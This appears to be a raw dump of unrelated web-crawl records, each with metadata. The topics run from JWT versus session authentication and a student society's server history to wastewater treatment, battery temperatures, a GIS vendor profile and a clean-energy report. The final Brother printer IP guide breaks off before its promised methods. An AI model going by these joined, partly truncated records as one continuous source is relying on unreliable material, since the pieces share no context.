Both session-based authentication and JWT-based authentication can be suitable for containerized applications using Docker. The choice between the two largely depends on your application's specific requirements, architecture, and security considerations. - In session-based authentication, the server stores session information on the server-side (usually in memory or a database) and provides a session identifier (usually stored in a cookie) to the client. - This approach requires the server to manage session state, which can be a concern in distributed or load-balanced environments. However, solutions like Redis-based session stores can help address this issue. - Session-based authentication is generally straightforward to implement, and it allows for more control over session handling, like setting session expiration and invalidating sessions easily. - Since the session information is stored on the server-side, it can be more secure than storing user data in a token on the client-side. - However, it may not be ideal for stateless microservices or serverless architectures, where maintaining session state can introduce complexities. - JSON Web Tokens (JWT) are stateless tokens that contain user information and are signed by the server. The client (usually a web browser or a mobile app) stores the token and sends it with each request to authenticate the user. - JWTs are suitable for stateless architectures, such as microservices and serverless applications, as they do not require the server to store session information. - The token's payload can contain user-related data (claims), which eliminates the need for frequent database queries to validate the user during each request. - JWTs can be a good fit for distributed systems, where each service can independently verify the token without relying on a central session store. - They are often used in conjunction with Single Sign-On (SSO) and provide better scalability for large-scale applications. In summary, both session-based and JWT-based authentication can work well in containerized applications using Docker. Consider the following factors to help make the right choice: - Application architecture: If your application follows a stateful architecture, session-based authentication might be a better fit. For stateless architectures, JWTs can be more suitable. - Security requirements: JWTs can be a good option for ensuring stateless and scalable authentication, but the security of the token itself becomes crucial. Proper token signing and validation practices are essential to prevent security issues. - Distributed environments: If your application will be deployed in a distributed environment with multiple instances, JWT-based authentication can be more convenient. Ultimately, both methods have their pros and cons, and the decision should be based on your application's specific needs and the level of security and complexity you are comfortable with.
systems_science
http://compsoc.dur.ac.uk/content/about-compsoc/toast/
2017-03-30T16:40:46
s3://commoncrawl/crawl-data/CC-MAIN-2017-13/segments/1490218195419.89/warc/CC-MAIN-20170322212955-00171-ip-10-233-31-227.ec2.internal.warc.gz
0.960821
672
CC-MAIN-2017-13
webtext-fineweb__CC-MAIN-2017-13__0__306656613
en
The society has it's own Linux server which this page is served from. It is informally referred to as Toast, and has undergone a few transformations in its time. Toast was originally an AMD-K6 400 PC with 256 MB of RAM running the Debian distribution of GNU/Linux (Slink, Potato, Woody) on a Linux 2.4 kernel. It had 2 IDE hard drives, and two 40Gb holding user files. Also it used to have two external SCSI system disks, which died as we moved data to the new machine. It was later augmented to a more up to date machine with 1GB of RAM, more disk space and internal system disks. This hardware ran Woody and then Sarge. The actual spec was an AMD XP 2500+ CPU, 1GB of RAM and several hard disks. There were 40GB disks for system data and then one 120GB and another 160GB disk for user data. Wondering why the 160GB disk? Well, the old 120GB disk started to fail so we replace it with a newer disk. From 1999-2001 toast lived in DSU Publications Office, Dunelm House (thanks to Dave Ellams and Jenny Radcliffe); it now lives in the machine room of the Computer Science department on the Science Site. Sometime in 2003 the AMD K6 machines secondary hard disk controller failed. So we decided to buy new hardware. To cover the society between machines we had to run on temporary hardware. Michael Young of the ITS was very helpful with keeping the box up over this patchy period. Again helpful whilst we transplanted the install over to the new hardware. It got very messy with two Toasts, lots of broken mirrors, failing SCSI disks, broken kernel drivers, lack of floppy and CD-ROM drive. Later transpires one of the sticks of RAM had some major errors on it. It was basically dying right in front of our eyes. The case was noted for the power button being round the back since people had a habit of turning it off whilst it lived in Dunelm House. In June 2006 things started again to go wrong with Toast. One of the user data disks mysteriously failed, one of the mirrored system disks started failing self tests, and the other fell out of the mirror altogether. Toast was becoming unreliable, and needed replacing. Luckily we were able to get DNUK to sponsor us with a new server. Nicknamed Pitta, the changeover took place on 29th November. The new (and current) specs are a Pentium 4 540 / 3.4 GHz, with 1024MB RAM and two 250GB hard drives. Its canonical name is now bylands.dur.ac.uk, and its IP is 188.8.131.52, both but compsoc.dur.ac.uk and toast.durge.org are CNAMEs to it, and are more commonly used. Mail can be received at either of these addresses, or alternatively mail can be sent to addresses [email protected] website is served from Toast, and can be accessed at both http://compsoc.dur.ac.uk and http://ducs.org.uk Last edit: Mon 15th Sep, 10:52 p.m.
systems_science
https://nelsonengineering.net/alpine-wastewater-treatment-plant/
2024-03-03T00:07:11
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947476137.72/warc/CC-MAIN-20240302215752-20240303005752-00689.warc.gz
0.917109
581
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__97795216
en
The Alpine wastewater treatment plant is a membrane bioreactor (MBR) type of activated sludge facility designed to treat a maximum day flow of 0.4 MGD and be expanded to 0.8 MGD. The primary treatment facilities consist of two parallel 2 mm rotating screens with integral washer compactor and screenings bagging system, influent flow measurement, and a raw wastewater lift station. The secondary/tertiary treatment process has two flow trains each consisting of a flow equalization/anoxic/pre-aeration basin and a membrane biological reactor. The raw sewage is comingled in the anoxic basin with the mixed liquor returned by gravity from the MBR. Denitrification, removal of nitrate from the process stream, occurs when the heterotrophic bacteria convert nitrates (NO3) to nitrite and nitrogen gas as part of cellular respiration. The flow then enters a pre-aeration basin where the dissolved oxygen is increased to 2.0 mg/l with fine bubble aeration and variable speed blowers utilizing a DO probe to control the process. The wastewater is then lifted into the membrane bioreactor at a constant flow which is adjusted once per day based on influent flow. Each membrane bioreactor (MBR) contains 1600 submerged flat plate membranes that filter the mixed liquor, retaining the solids in the bioreactor and allowing the clear effluent to pass through. Each membrane unit in the MBR has integral air diffusers to furnish air for process oxygen requirements, membrane cleaning, and mixing requirements. The bioreactor can be operated at a mixed liquor suspended solids (MLSS) concentration of 8000 to 12000 mg/l. The clear effluent flows by gravity through an ultra-violet (UV) treatment process for final disinfection and is then discharged to the Snake River at Palisades Reservoir. The flat plate membranes provide greater than 6-log removal of bacteria and 4-log removal of viruses, so disinfection requirements are very low. Typical effluent has BOD5 and TSS concentration below 5 mg/l, ammonia less than 1 mg/l, nitrate less than 10 mg/l, turbidity less than 0.1 NTU, and fecal coliform non-detected. Biosolids are wasted to an aerobic digester where they are treated to meet Class B standards. The solids concentration in the digester is thickened to 3% via another submerged membrane to increase the storage capacity of the digesters. The digested biosolids are placed into a trailer mounted gravity filter that retains the solids and allows the water to pass through the filters and back to the treatment plant headworks. The biosolids at a concentration of 15% are then used at the plant site as a soil amendment or hauled to the landfill.
systems_science
http://batteryuniversity.com/learn/article/discharging_at_high_and_low_temperatures
2015-10-04T21:17:24
s3://commoncrawl/crawl-data/CC-MAIN-2015-40/segments/1443736676092.10/warc/CC-MAIN-20151001215756-00121-ip-10-137-6-227.ec2.internal.warc.gz
0.910284
995
CC-MAIN-2015-40
webtext-fineweb__CC-MAIN-2015-40__0__103922248
en
Explore the limitations when operating a battery at adverse temperatures and learn how to minimize the effects. Like humans, batteries function best at room temperature, and any deviation from the comfort zone changes performance and/or longevity. While operating a battery at elevated temperatures momentarily improves performance by lowering the internal resistance and speeding up the chemical metabolism, such a condition shortens service life. Some manufacturers of lead acid batteries make use of improved performance at warmer temperatures and specify the batteries at a toasty 27°C (80°F). Cold temperature increases the internal resistance and lowers the capacity. Batteries that would provide 100 percent capacity at 27°C (80°F) will typically deliver only 50 percent at –18°C (0°F). The capacity decrease is momentary and the level of decline is related to the battery chemistry. Li-ion also performs better when warm. Heat lowers the internal resistance but this stresses the battery. Warming a dying flashlight or cellular phone battery in your jeans might provide additional runtime due to better energy delivery. As all drivers in cold countries know, a warm battery cranks the car engine easier than a cold one. The dry solid-polymer battery requires a temperature of 60–100°C (140– 212°F) to promote ion flow and get conductive. This type of battery has found a niche market for stationary power applications in hot climates where heat serves as a catalyst rather than a disadvantage. Built-in heating elements keep the battery operational at all times. High battery cost and safety concerns have limited the application of this system. The more common lithium-polymer uses moist electrolyte to enhance conductivity. All batteries achieve optimum service life if used at 20°C (68°F) or slightly below. If, for example, a battery operates at 30°C (86°F) instead of a more moderate room temperature, the cycle life is reduced by 20 percent. At 40°C (104°F), the loss jumps to a whopping 40 percent, and if charged and discharged at 45°C (113°F), the cycle life is only half of what can be expected if used at 20°C (68°F). (See also BU-808: How to Prolong Lithium-based Batteries.) The performance of all battery chemistries drops drastically at low temperatures. At –20°C (–4°F) most nickel-, lead- and lithium-based batteries stop functioning. Although NiCd can go down to –40°C (-40°F), the permissible discharge is only 0.2C (5-hour rate). Specialty Li- ion can operate to a temperature of –40°C, but only at a reduced discharge; charging at this temperature is out of question. With lead acid there is the danger of the electrolyte freezing, which can crack the enclosure. Lead acid freezes more easily with a low charge when the specific gravity of the electrolyte is more like water than when fully charged. Cell matching by using cells of similar capacity plays an important role when discharging at low temperature under heavy load. Since the cells in a battery pack can never be perfectly matched, a negative voltage potential can occur across a weaker cell on a multi-cell pack if the discharge is allowed to continue beyond a safe cut-off point. Known as cell reversal, the weak cell will get damaged to the point of developing a permanent electrical short. The larger the cell-count, the greater the likelihood of cell-reversal is under load. Over-discharge at a heavy load at a low temperature is also a large contributor to battery failure of cordless power tools, especially nickel-based packs. (See BU-803: Can Batteries be Restored? Go to Cell Mismatch, Balancing.) Users of electric vehicles must understand that the driving distance between charges is calculated under normal temperature; frigid cold temperatures will reduce the available mileage. Using battery electricity to heat the cabin is not the only reason for reduced driving distance; the battery does not perform well when cold but it will recuperate when warm. Last updated 2015-03-30 Comments are intended for "commenting," an open discussion amongst site visitors. Battery University monitors the comments and understands the importance of expressing perspectives and opinions in a shared forum. However, all communication must be done with the use of appropriate language and the avoidance of spam and discrimination. If you have a question, require further information, have a suggestion or would like to report an error, use the "contact us" form or email us at: [email protected]. While we make all efforts to answer your questions accurately, we cannot guarantee results. Neither can we take responsibility for any damages or injuries that may result as a consequence of the information provided. Please accept our advice as a free public support rather than an engineering or professional service.
systems_science
http://play.pandacraft.org/forum/view_topic/?tid=367
2018-01-17T12:46:35
s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084886939.10/warc/CC-MAIN-20180117122304-20180117142304-00137.warc.gz
0.944907
912
CC-MAIN-2018-05
webtext-fineweb__CC-MAIN-2018-05__0__230130817
en
PandaCraft Skyblock will be switching away from the old pipe system completely on April 13th. The old pipe system is the one that involves using glass blocks and pistons, along with redstone clocks, to create a pipe to transfer items. On April 13th, I will remove that system so it will no longer function. If you have pipes on your island, be sure to replace them with the new Cargo Network system before then if you want your item transport systems to continue to function. Watch this video for a tutorial on the new Cargo Networks: There's also a small example at Spawn, which you can teleport to with the command, "/warp ex", that showcases the Cargo Network in action. There's a hopper that you can throw items or blocks into. Some blocks will be placed by the Placer and then broken by the Miner and everything else gets spit back out by a Dropper, so you'll get your items back. It demonstrates how you can use the Cargo Network to send different items to different places with Whitelists or Channels, and that the new Cargo Nodes can activate my custom Machines, like Placers, Miners, Crafters, etc.. So, why are we replacing the old pipe system? A few reasons: - The old system needed Redstone Clocks to operate. This creates extra work for the server as redstone clocks can be notoriously laggy. The new system doesn't need any redstone to operate. - The old system required separate colored pipes to transport items to different places. This means more pipe calculations need to be done and more redstone clocks need to be used. The new system uses built-in channels, whitelists, and blacklists to accomplish the same thing with just one single Network. - The old system wasn't compatible with my custom machines and I had no way to make it compatible. This means you had to pipe into hoppers connected to my machines to activate them. The new system has code in place I was able to use to make my machines compatible with it, meaning the Cargo Nodes can activate my machines without any hoppers involved. Hoppers are also notorious for causing lag and islands have a limit of 100 hoppers, so using less hoppers on the machines is a win-win. - The old system was very limited in what you could do with pipes. The new system gives you many options, like round-robin mode to equally distribute items, whitelists, blacklists, channels, and the ability to check items' lore or data values. - The old system took up a lot of space on the islands. As cool as it looks having multiple colored pipes running everywhere, it can be tedious to work around them and reconfigure them. The new system is "wireless", requiring only the placement of Nodes which can interact with each other through blocks, so you can run a Network right through a wall without needing to break a hole in it. You can even hide the particles that display the connections between the Nodes by right-clicking on the Cargo Manager. - Performance. As previously mentioned, clocks and hoppers can cause lag. With multiple old pipes on each island, clocks at every input piston, and hoppers on machines, the pipes can quickly eat away at the server's performance. Redstone clocks have to be processed by the server and many plugins also listen to that same data even if they don't need it, so those plugins than cause even more lag. It's easy to accidentally place a pipe next to a glass wall or create an infinite loop of pipes, which causes them to do a lot of extra calculations they don't need. The new system is significantly more stable and performant. Here's some graphs to help visualize the difference: Performance with Pipes: Perfromance with Cargo Networks: Orange = lag. Green = Server TPS. There is currently one main caveat with the new system, which I will fix as soon as possible. The new system is currently unable to interface properly with Furnaces, meaning you will have to use hoppers on your furnaces and feed into the hoppers using Cargo Nodes. This ensures the items go into the appropriate furnace slots. Otherwise, you may end up putting items into, or pulling out of, the wrong slots. Again, I will fix this as soon as I can. So, make sure you get those pipes replaced by April 13th!
systems_science
http://dornsife-blogs.usc.edu/wrigley/?m=201807&paged=2
2020-05-25T19:49:37
s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590347389355.2/warc/CC-MAIN-20200525192537-20200525222537-00360.warc.gz
0.943015
643
CC-MAIN-2020-24
webtext-fineweb__CC-MAIN-2020-24__0__189269358
en
By: Andrew Q. Pham Hey everyone! I am a rising undergraduate junior in the Lab for Autonomous and Intelligent Robotics (LAIR) at Harvey Mudd College. My lab mainly works on multi-robot systems and their applications in the field. Many modern-day tasks that humans must perform can be dangerous, time-consuming, and/or mundane. One goal of robotics is to alleviate this burden, and oftentimes make the tasks more efficient. My project is attempting to make acquiring video footage of sharks easier and less time-consuming. The project is in collaboration with CSU Long Beach’s Shark Lab. Many biologist, like those at Shark Lab, use video recordings of animals in their natural habitat to study their behavior. However, tracking and monitoring sharks is a lengthy endeavor. Researchers must spend long hours (24-72 hours) on boats to acquire data. This project is specifically attempting to make this process easier by using multiple autonomous quadcopters to capture overhead footage of sharks. Most consumer grade quadcopters are incredibly nimble and small, being able to survey an area quickly. However, the tradeoff for this agility is a small battery life (about 20 minutes for the quadcopters I use). To counteract this limited battery life, a few autonomous surface vehicles (ASVs) are included in our multi-robot system. ASVs are basically autonomous boats. For this system, they function as landing platforms and recharge stations for the quadcopters. The general idea of the system is to have the quadcopters patrol over an area where the sharks are located, recording footage the entire time. The ASVs will be stationed nearby, and the quadcopter will periodically land on them to recharge. My research specifically focuses on creating an algorithm that coordinates the motion of the quadcopters. However, what I do day-to-day varies drastically. Somedays I will be working on hardware, building components for the ASV or debugging electronics. Other days I will be working on software, coding up simulations or brainstorming the math for the algorithm. Currently, I am putting the finishing touches on the system before I perform full trials. Where I do my work also varies drastically. One week I may be back at my college campus, touching base with my research advisor or gathering parts for the robots. Another week I may be back at the Wrigley Marine Science Center (WMSC) on Santa Catalina Island, deploying and testing the robots in Big Fisherman Cove. Even though the work and travel can get hectic, it is overall incredibly fun. One thing that helped to keep this crazy amount of work manageable has been the 2018 Wrigley Summer Fellowship. The Wrigley Fellowship has been helpful for my research, giving me place to effectively test the robots as well as a place to stay. I only have a couple weeks of my summer research left to go and a whole lot left to do. But, so far, this summer has been educative, exciting, and gone by too fast! Feel free to contact me at [email protected] if you have any further questions.
systems_science
https://myaccess.georgetown.edu/pls/bninbp/bwckctlg.p_display_courses?term_in=201730&one_subj=OPIM&sel_subj=&sel_crse_strt=250&sel_crse_end=250&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=
2018-10-22T10:23:04
s3://commoncrawl/crawl-data/CC-MAIN-2018-43/segments/1539583515029.82/warc/CC-MAIN-20181022092330-20181022113830-00048.warc.gz
0.844699
159
CC-MAIN-2018-43
webtext-fineweb__CC-MAIN-2018-43__0__228450756
en
|Select the Course Number to get further detail on the course. Select the desired Schedule Type to find available classes for the course.| |OPIM 250 - Mgmt Information Systems| This course prepares the student to interact with, manage within and be sensitive to the current and emerging trends in information technology. The course material will cover computer hardware and software, database management systems, telecommunications, and the systems analysis process. The course also examines the strategic importance of computing and related social and ethical issues. Computer laboratory assignments will be used to illustrate information systems concepts and applications. Formerly offered as MGMT 250. 3.000 Credit hours 3.000 Lecture hours 0.000 Lab hours Schedule Types: Lecture Operations & Information Mgmt Department
systems_science
https://gis.cioadvisorapac.com/vendor/geis-enabling-business-systems-with-location-intelligence-cid-979-mid-94.html
2021-07-25T08:43:33
s3://commoncrawl/crawl-data/CC-MAIN-2021-31/segments/1627046151641.83/warc/CC-MAIN-20210725080735-20210725110735-00441.warc.gz
0.937485
1,875
CC-MAIN-2021-31
webtext-fineweb__CC-MAIN-2021-31__0__149769514
en
GEIS: Enabling Business Systems With Location Intelligence Stephen Cosgrove, Founder The era of GIS has dawned. The word ‘location’ immediately brings to mind Google Maps, as it has given an entirely new dimension to geospatial intelligence and travel. Geospatial intelligence is gaining traction among enterprises for efficient asset management and tracking. It brings crucial context to a number of business aspects from market planning to operational optimization as it reveals patterns, connections, opportunities, and risks that are difficult to decipher otherwise. GIS is emerging from an arcane backroom operation to becoming just another data dimension in enterprise systems such as ERP and CRM. As a result, GIS is no longer treated as a special case to be managed outside the usual IT norms. Further, the commoditization of geospatial maps by players such as Google has contributed to removing GIS’ “special” status. When it comes to integration of GIS data with enterprise systems, a common issue is ensuring that all parties are referring to the same device or structure and that the nomenclature is aligned, as the operations teams typically do not have much exposure to or knowledge of the GIS system. Wherever possible open standards, such as the Common Information Model (CIM), and open protocols, such as those administered by the Open Geospatial Consortium (OGC), should be used to allow interoperability between enterprise and GIS systems. Standards adoption is helpful when seeking to employ modern agile management techniques, including Dev/ Ops/Continuous Delivery methodologies which enforce standard pipeline and delivery practices in GIS systems. As an expert geospatial technology integration and consultancy services provider, GEIS operates on both sides of the fence—geospatial expertise and subject-matter knowledge –to enable businesses to integrate and effectively leverage their GIS data. GEIS is a provider and integrator of geospatial and location-based software solutions that enable effective planning, management, and control of networks, assets, and resources concerning utilities, telecoms, and other industries. “From an integration perspective, we encourage the use of appropriate open standards such as Common Information Model (CIM) within the power distribution industry, rather than point-to-point interfaces,” says Stephen Cosgrove, Founder of GEIS. The company’s innovative and feature-rich products redefine institutional geospatial capacity and the scope of user adoption. “GEIS simplifies and takes the complexity out of geospatial solutions and implementations that include adding a data dimension to existing ERP systems or providing mapping data within these business solutions,” says Cosgrove. GEIS was founded in the mid-eighties to support mainframe and manufacturing-based systems. Later, the company changed its focus to the burgeoning geospatial industry segment. Our team has acquired experience across the utility and telecommunication space that gives us a greater level of subject matter expertise than being ‘pure’ GIS specialists Since then, the company has been working on GE’s Smallworld product suite - a GIS with a market-proven portfolio of products that support the full lifecycle for network assets from strategic planning, design, and build to operations support. GEIS is a GE Smallworld partner, and their Mundi solution supports clients in making complete use of their asset data collected from the Smallworld products. GEIS’ solutions are well received by GE customers in the market. As a ready-to-deploy GE Network Viewer extension, GEIS’ Mundi delivers an enhanced business solution by complementing and extending the feature set. The solution is highly configurable and enables clients to turn features on and off to simplify the view for end-users. Mundi’s query tool supports nuanced queries for users. Clients can also make use of the measurer tool for segment length and angle information to project directions and distance in their GIS projects. Mundi provides a fully-functioning Explorer tool that supports a wide range of formats. The tool also offers the ability to assemble a client’s collection of records, which may then be used as the input to a Thematics operation or sent to a third-party system. It provides a sophisticated Thematics engine that enables on-the-fly styling of the map data by an arbitrary combination of filters. In addition, Mundi offers a sophisticated layer control system that supports preset visibilities, grouping, mutual exclusion of layers, and opacity. Here, layers can be interlinked and presented in a variety of styles as the underlying data dictates, including radio buttons and dropdowns. What’s more, Mundi includes support and tracing for physical network inventory (PNI). Mundi is currently deployed in three countries, both in the utility and local government sectors. In addition to in-house use, Mundi is used as the public-facing web mapping portal, and also deployed in the field for use as a mobile solution. GEIS offers a PNI based product— Pathfinder—that finds paths between two structures in a fiber network. Pathfinder identifies areas offiber splicing to complete a path through the network and can automatically perform the necessary splices to create a complete end-to-end fiber path. The solution can output a splice report detailing the network changes, displaying multiple fiber paths between two structures. Clients can view business information such as fiber owners, leases, and current usage types about the paths to make informed splicing decisions. The solution supports both cable connectivity and graphical splice diagrams and automatically orthogonalizes new connections in splice diagrams to ensure tidiness. The ‘No Surprises’ Agenda “We believe that clients need a solution that is suited to their current and future needs. Our team has acquired experience across the utility and telecommunication space that gives us a greater level of subject matter expertise than being ‘pure’ GIS specialists,” says Cosgrove. The GEIS team goes the extra mile for its clients by guaranteeing ‘No Surprises' in all of their services. Cosgrove emphasizes, “The key to delivering to the ‘No Surprises’ principle is to have sound knowledge of the business drivers, objectives, and processes. This leads to the right solution for the client, and not just a technical solution. The payback is once a project commences, our insight ensures that an optimum outcome is achieved within the agreed timeframe.” Having worked closely with clients in the utility and telecommunication industry for decades, the GEIS team has acquired a sound, practical understanding of its complex challenges. “Our team believes technology only reaches its full potential when it is driven by an intuitive understanding of the business it serves,” says Cosgrove. The team identifies client requirements and suggests suitable products for them depending on where they are in their development and product maturity cycles. Most often, the company uses cloud-based tools to assist inthe collaboration and to enable clear and concise communication externally and internally, which is essential for successful outcomes. Further, GEIS takes a flexible and agile approach to deliver solutions while complying with regulations and providing higher returns. “We aim to make sure that the appropriate solution is covered in the initial implementation,” adds Cosgrove. The client services team is available anytime, providing front-line support capable of guiding customers, overseeing implementation, and delivering training services. Altogether, the company proactively serves and supports its customers, essentially reducing their concerns and allowing them to remain focused on other areas. “System integrations tend to be both complex and critical to our client’s BAU processes. Several of our clients have effectively outsourced day-to-day support to GEIS, giving them confidence that issues arising with business-critical processes will be addressed in a timely manner by highly expert personnel,” remarks Cosgrove. "The key to delivering to the ‘No Surprises’ principle is to have sound knowledge of the business drivers, objectives, and processes. This leads to the right solution for the client and not just a technical solution" For over a decade now, GEIS has assisted numerous clients on the geospatial front. The company has worked with GE in the globalization of its GE Electric Office product. This led to GEIS being subcontracted to undertake the first Electric Office 4.3 implementation worldwide. Similarly, GEIS has developed interfaces to a number of advanced distribution management systems (ADMS). In addition, GEIS has helped telecommunications clients by supporting integration activities between OSS and BSS systems to expose GIS data more widely to operational and business functions. GEIS will continue to enable its customers to make informed and practical decisions in combination with their wide range of the latest geospatial solutions. “We want to continue to be one of the preeminent geospatial technical solution providers and integrators. We are committed to assisting companies in exposing their spatial and location resources to a wider enterprise audience, which will provide considerable additional value using web mapping tools without the need for data migration,” concludes Cosgrove.
systems_science
https://ohiorivervalleyinstitute.org/a-clean-energy-pathway-for-southwestern-pennsylvania/
2023-12-05T08:55:56
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100550.40/warc/CC-MAIN-20231205073336-20231205103336-00857.warc.gz
0.931443
1,924
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__131939492
en
This report describes the development and analysis of a clean energy pathway for a 10-county region in southwestern Pennsylvania. Due to its abundance of fossil fuel resources, the region has a long history of substantial energy production, often at the expense of local environmental quality and economic diversity. A transition to clean energy provides a compelling opportunity to transform the local energy profile, while ending the region’s overreliance on fossil fuels, to reduce emissions and pursue a path of sustainable growth. To date, the prevailing narrative for decarbonizing this region has centered around the perpetuation of the natural gas industry and costly investments in carbon capture and storage (CCS) technologies and infrastructure. Strategen’s analysis provides an alternative focused primarily on zero emissions resources, energy efficiency, increased electrification, and leveraging clean energy imports from outside the region, while minimizing the local need for fossil fuels. Key Takeaways from this study: - A renewables-based pathway, including energy efficiency and clean energy imports from the PJM market, is more cost-effective than continued reliance on fossil fuels. A strategy focused on natural gas and carbon capture will be 13% more costly than the clean energy pathway, which avoids expensive investments in CCS technologies to reduce emissions, while limiting the region’s exposure to fuel price volatility and mitigating the risk of stranded fossil fuel assets. - In the developed decarbonization pathway, all coal plants and a significant portion of natural gas plants in the region will retire or reduce output by 2035, drastically reducing emissions going forward. A limited portion of natural gas plants may be kept online as capacity or peaking resources and to ensure reliability, though clean dispatchable resources could potentially serve this role in the future, as technology progresses. - The clean energy pathway results in a 97% reduction in CO₂ emissions from the power sector by 2050, leading to environmental benefits of nearly $2.7 billion annually. These benefits are greater than those associated with strategies built around natural gas and CCS, furthering the case for the clean energy pathway as a least cost option for energy transition. - Deep electrification of the transportation and buildings sectors can directly lower regional CO₂ emissions from these sectors by 95%. The total annual value of environmental and health benefits associated with combined reductions from the power, buildings, and transportation sectors reaches $4.2 billion in 2050, through avoided social costs. - Through reduced reliance on natural gas for power generation and in buildings, Strategen’s decarbonization pathway will decrease natural gas consumption by 96% and 98%, respectively, for two these sectors by 2050. Lower consumption provides an opportunity to reduce emissions associated with natural gas extraction. The value of these avoided emissions would surpass $1 billion in 2050 alone. - Energy efficiency is projected to increase over time, reducing regional electricity load by an average of 2.6% each year of the study period. Combined with electrification, the clean energy pathway results in overall load growth of 33% by 2050. - Efficiency measures not only reduce load, emissions, and the need for additional generation, but also lead to local job creation and savings for consumers. Expenditures on efficiency and resulting residential bill savings support 12,416 total jobs in 2035, and 15,353 total jobs by 2050. Compared to both power generation and fossil fuel extraction, energy efficiency has a greater potential for local economic development, leading to more, higher-paying jobs served by workers and suppliers within the region. Focusing on the power sector as the backbone of the region’s clean energy transition, Strategen conducted analysis to develop a clean, reliable, and cost-effective resource mix for meeting electricity demand, in a manner more consistent with efforts to limit global warming potential to 1.5° Celsius by 2050. The clean energy analysis additionally included deep electrification to transition nearly all fuel usage from the buildings and transportation sectors to further reduce emissions as the power sector decarbonizes over time. Through the use of an in-house dispatch model, Strategen employed data on localized hourly demand, the potential for renewable energy and energy efficiency improvements, import transmission capacity, and cost forecasts to simulate the operation of the electric grid and determine the necessary resource mix for the region, with limited contributions from fossil generation to ensure reliability. Strategen’s analysis found that harnessing the local potential for renewable energy in the region and importing clean energy from the PJM interconnection allows for the retirement of all coal resources by 2035 and nearly all natural gas generation by 2050. For balancing and reliability, there is a need for some natural gas or other dispatchable resources to remain on the system, but even these resources have the potential for future decarbonization through possible advancements in technology. Over time, the region transitions from a net exporter of electricity to a net importer, through the ability to leverage cleaner resources from areas rich in renewable potential via the regional PJM energy market. By 2050, approximately 31% of the energy supply is expected to come from outside of the region. At the same time, electrification, net of increased energy efficiency, results in a 33% growth in load, with the majority met by zero emissions resources, including wind, solar, hydroelectric and nuclear power. Of these resources, solar and wind would experience the largest expansion, increasing demand for land and workers locally and within the PJM region. Strategen’s clean energy pathway for the region is actually lower cost than a pathway that relies on natural gas resources with carbon capture. For this comparison, an alternative scenario was developed, assuming that generation must be local to the region and that natural gas resources were not retired, paired with CCS technology instead. Overall, the clean energy pathway for the power sector is 13% less expensive than a pathway relying on gas and CCS. The clean energy pathway reduces emissions drastically, cutting CO₂ emissions by 92% by 2035 and 97% by 2050. The reductions result in environmental and health benefits of more than $2 billion in 2035, reaching $2.7 billion annually by 2050. These environmental benefits are greater than those associated with the alternative case built around natural gas and CCS, further underscoring the finding that a clean energy transition minimizing the use of fossil fuels would be the least cost pathway for southwestern Pennsylvania. Through electrification, the clean energy pathway additionally reduces CO₂ emissions from the buildings and transportation sectors by 46% in 2035 and 95% by 2050, resulting in annual environmental and health benefits valued at $572 million and $1.5 billion in 2035 and 2050, respectively. In total, reductions in CO₂ from the power, buildings, and transportation sectors lead to annual benefits of $4.2 billion in 2050, through avoided social costs. Furthermore, the developed clean energy pathway reduces the region’s reliance on natural gas for power generation and in buildings, resulting in decreases in overall consumption of natural gas from these two sectors of 96% and 98%, respectively, by 2050. This drop in demand, which reaches 500 billion cubic feet annually by the end of the study period, provides the potential opportunity to lower emissions from natural gas extraction. Treated as a corresponding decrease in natural gas production in the region, the value of these avoided emissions and associated damages totals more than $1 billion in 2050. From an economic development perspective, Strategen’s proposed decarbonization pathway offers further advantages for the local economy. Energy efficiency improvements provide a particularly strong opportunity, as the region transitions away from fossil fuels, generating economic activity in labor-intensive sectors and leading to job creation in industries served by the local workforce. Strategen conducted analysis to explicitly estimate the job creation potential from energy efficiency improvements included in the clean energy pathway for the region, using local multipliers from the U.S. Bureau of Economic Analysis, finding that expenditures on efficiency and resulting residential bill savings support 12,416 total jobs in 2035, and 15,353 total jobs by 2050. Energy efficiency provides tremendous value not only as a cost-effective alternative to utility scale generation, but also as a compelling driver for local economic development. Compared to electric power generation and fossil fuel extraction, energy efficiency has greater potential for local, sustainable growth. Analysis of multiplier data for the 10-county region shows that efficiency investments create more jobs than these industries, and that the jobs created offer higher wages. Moreover, most efficiency improvements, such as upgrades in lighting, insulation, doors and windows, or heating and cooling systems, can be performed by local workforce, supporting jobs for contractors and suppliers within the region. This is especially true for rural or exurban areas. In contrast, industries such as natural gas extraction have often relied heavily on workers and suppliers from out of state. Energy efficiency therefore offers a particularly attractive option for a region where job growth and personal income have significantly trailed national growth rates since the beginning of the natural gas boom. Southwestern Pennsylvania carries a disproportionate socio-economic and environmental burden from the energy industry, but a power sector decarbonization pathway for southwestern Pennsylvania that leverages clean energy imports from the PJM market and is focused on renewable energy, existing nuclear, energy storage, and energy efficiency has the potential to transform the region and shift away from its reliance on fossil fuels. The clean energy pathway designed by Strategen results in cost savings, emissions reductions, and local economic development, laying the groundwork for sustainable prosperity in the 10-county region.
systems_science
https://trueimagetech.com/blogs/all/how-to-find-brother-printer-ip-address
2024-02-25T21:18:02
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474643.29/warc/CC-MAIN-20240225203035-20240225233035-00542.warc.gz
0.888674
1,612
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__62643739
en
Brother Printer is a well-known printer brand widely acclaimed for its high quality, performance, and reliability. This brand offers a variety of printer models suitable for various application scenarios, such as homes, small offices, and large enterprises. Of course, an IP address is very important for printers. The IP address is important in network connection, remote printing, printer settings and management, and user network security. This blog will introduce what an IP address is and how to find a Brother IP address, hoping to be helpful to readers. What Is The IP Address Of A Printer? The printer IP address is the address used to uniquely identify the printer in the network, similar to the IP address of a computer. The printer IP address consists of four numbers, each between 0 and 255, separated by dots. These numbers can be divided into two parts: one is used to identify the network, and the other is used to identify the uniqueness of the computers connected to the network. The printer IP address is unique in the network and is used to find and connect to specific printers on the network. The printer IP address can be configured manually or automatically. When configuring the printer IP address, it is necessary to follow certain steps to ensure the printer can be correctly connected to the network and used normally. Many Brother printers have wireless capabilities, allowing you to connect multiple devices without setting the printer to run on a specific network. In most cases, you only need to connect the printer to a Wi-Fi network. How To Find The IP Address Of A Brother Printer? You can use the following four methods to find the IP addresses of Brother printers: 